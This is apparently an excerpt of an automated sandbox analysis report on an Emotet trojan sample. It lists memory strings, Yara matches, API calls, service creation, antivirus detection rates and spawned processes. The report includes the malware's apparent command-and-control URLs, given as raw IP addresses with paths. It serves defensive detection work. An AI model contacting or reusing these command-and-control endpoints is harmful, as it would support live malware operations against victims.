                Source: svchost.exe, 0000000B.00000002.313901716.000001DF72413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000009.00000002.493508212.0000022CEBC2A000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000009.00000002.493508212.0000022CEBC2A000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 0000000B.00000003.313632584.000001DF7244B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000B.00000002.313976950.000001DF72454000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 0000000B.00000003.313648820.000001DF72441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000B.00000003.313648820.000001DF72441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                Source: svchost.exe, 0000000B.00000003.313632584.000001DF7244B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313976950.000001DF72454000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.313901716.000001DF72413000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.313645092.000001DF72445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.313645092.000001DF72445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313951325.000001DF72439000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000B.00000002.313913232.000001DF72425000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://51.89.199.141:8080/kQ2qQ4p/1FQKfDAunw/1vITsOyC7bA2XShy/bcsdjT00jJ/b6D7wBgDOTgK988MK/MO2mf0Mgq
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/$f
                Source: KBDTUQ.exe, 00000003.00000002.495442145.00000000023F2000.00000004.00000001.sdmpString found in binary or memory: http://80.227.52.78/5VyqhybV/hBUnM8a/pu6SqF/-f
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000004.00000002.496997385.0000022687412000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000004.00000002.498030150.0000022687860000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 0000000B.00000002.313901716.000001DF72413000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000009.00000002.493616710.0000022CEBC45000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000009.00000002.493508212.0000022CEBC2A000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000009.00000002.493508212.0000022CEBC2A000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 0000000B.00000003.313632584.000001DF7244B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000B.00000002.313976950.000001DF72454000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 0000000B.00000003.313648820.000001DF72441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000B.00000003.313648820.000001DF72441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                Source: svchost.exe, 0000000B.00000003.313632584.000001DF7244B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313968364.000001DF72447000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313976950.000001DF72454000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000B.00000003.313624018.000001DF7245F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.313959058.000001DF7243E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.313901716.000001DF72413000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.313645092.000001DF72445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.313645092.000001DF72445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.291934932.000001DF72430000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.313951325.000001DF72439000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000B.00000002.313913232.000001DF72425000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0041F8D4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0041F8D4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_0041F8D4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000000.00000002.230106819.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.230764484.0000000002861000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.230167872.00000000024A4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.494965360.0000000002214000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.495069915.0000000002261000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.494701716.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 3.2.KBDTUQ.exe.2260000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Eacu0dRnuP.exe.2860000.1.unpack, type: UNPACKEDPE
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02262650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02262650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile created: C:\Windows\SysWOW64\fphc\Jump to behavior
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile created: C:\Windows\SysWOW64\fphc\Jump to behavior
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile deleted: C:\Windows\SysWOW64\fphc\KBDTUQ.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile deleted: C:\Windows\SysWOW64\fphc\KBDTUQ.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D558
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00420953
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_004109F3
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00409F47
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02868240
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02867740
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02866530
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863BA0
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863F20
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02861C70
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863D10
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C5ABE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C92DE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C380E
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C58AE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C80CE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C573E
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C9DDE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0040D558
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00420953
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_004109F3
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_00409F47
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02868240
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02867740
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02866530
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863BA0
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863F20
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02861C70
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02863D10
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C5ABE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C92DE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C380E
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C58AE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C80CE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C573E
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_022C9DDE
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_0040D558
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_00420953
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_004109F3
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_00409F47
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02268240
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02267740
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02266530
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02263BA0
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02263F20
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02261C70
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02263D10
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D5ABE
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D92DE
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D380E
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D58AE
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D80CE
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D573E
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_021D9DDE
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: String function: 004231CF appears 31 times
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: String function: 0040E598 appears 61 times
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: String function: 0040DA1C appears 138 times
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: String function: 004231CF appears 31 times
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: String function: 0040E598 appears 61 times
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: String function: 0040DA1C appears 138 times
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: String function: 004231CF appears 31 times
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: String function: 0040E598 appears 61 times
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: String function: 0040DA1C appears 138 times
                Source: Eacu0dRnuP.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Eacu0dRnuP.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Eacu0dRnuP.exe, 00000000.00000002.229609206.000000000043F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRoundWindow.EXEP0 vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exe, 00000000.00000002.232691117.0000000002DE0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exe, 00000000.00000002.232691117.0000000002DE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exe, 00000000.00000002.232124434.0000000002CF0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exeBinary or memory string: OriginalFilenameRoundWindow.EXEP0 vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exe, 00000000.00000002.229609206.000000000043F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRoundWindow.EXEP0 vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exe, 00000000.00000002.232691117.0000000002DE0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exe, 00000000.00000002.232691117.0000000002DE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exe, 00000000.00000002.232124434.0000000002CF0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Eacu0dRnuP.exe
                Source: Eacu0dRnuP.exeBinary or memory string: OriginalFilenameRoundWindow.EXEP0 vs Eacu0dRnuP.exe
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                Source: classification engineClassification label: mal88.troj.evad.winEXE@18/8@0/3
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02264CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,
                Source: C:\Windows\SysWOW64\fphc\KBDTUQ.exeCode function: 3_2_02264CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0042309F EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_0042309F EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeCode function: 0_2_02865070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6268:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6268:120:WilError_01
                Source: Eacu0dRnuP.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: Eacu0dRnuP.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\Eacu0dRnuP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Eacu0dRnuP.exeVirustotal: Detection: 59%
                Source: Eacu0dRnuP.exeMetadefender: Detection: 43%
                Source: Eacu0dRnuP.exeReversingLabs: Detection: 62%
                Source: Eacu0dRnuP.exeVirustotal: Detection: 59%
                Source: Eacu0dRnuP.exeMetadefender: Detection: 43%
                Source: Eacu0dRnuP.exeReversingLabs: Detection: 62%
                Source: unknownProcess created: C:\Users\user\Desktop\Eacu0dRnuP.exe 'C:\Users\user\Desktop\Eacu0dRnuP.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\fphc\KBDTUQ.exe C:\Windows\SysWOW64\fphc\KBDTUQ.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
